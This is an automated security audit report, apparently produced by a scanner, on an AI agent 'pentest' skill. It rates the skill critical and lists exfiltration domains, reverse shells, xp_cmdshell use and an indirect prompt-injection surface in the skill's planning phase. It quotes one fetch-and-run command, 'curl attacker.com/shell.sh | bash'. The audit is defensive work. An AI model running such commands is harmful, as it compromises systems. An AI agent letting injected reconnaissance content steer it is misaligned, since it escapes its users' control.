pentest

Fail

Audited by Gen Agent Trust Hub on Mar 21, 2026

Risk Level: CRITICAL

Findings: DATA_EXFILTRATION, REMOTE_CODE_EXECUTION, COMMAND_EXECUTION, PROMPT_INJECTION, EXTERNAL_DOWNLOADS
Full Analysis
  • [DATA_EXFILTRATION]: Documentation files, specifically within the host-header and authentication guides, contain references to non-whitelisted and potentially risky domains such as attacker-server.com, app.interactsh.com, and ngrok.io. These domains are flagged by automated scanners for associations with phishing or OOB interaction testing. While intended as placeholders for security testing, they represent a data exposure surface.
  • [REMOTE_CODE_EXECUTION]: The reference library includes numerous examples of remote code execution techniques, such as piping remote scripts directly into bash or python interpreters. Furthermore, the skill contains obfuscated payloads using Base64 encoding to mask commands like curl attacker.com/shell.sh | bash within the attacks/essential-skills/burp-suite/essential-skills-cheat-sheet.md file.
  • [COMMAND_EXECUTION]: Multiple documentation files detail high-risk command execution patterns, including the use of database system commands like xp_cmdshell and various reverse shell one-liners across different languages (PHP, Python, Bash, Perl, Ruby).
  • [PROMPT_INJECTION]: The pentest orchestrator defined in SKILL.md has an indirect prompt injection surface. During Phase 3 (Planning & Approval), the agent is instructed to analyze reconnaissance findings which are derived from untrusted external sources (e.g., target web headers, API documentation). The skill does not define explicit boundary markers or sanitization steps to prevent this untrusted content from influencing the generated test plans or agent behavior.
Recommendations
  • Contains 5 malicious URL(s) - DO NOT USE
Audit Metadata
  • Risk Level: CRITICAL
  • Analyzed: Mar 21, 2026, 01:19 AM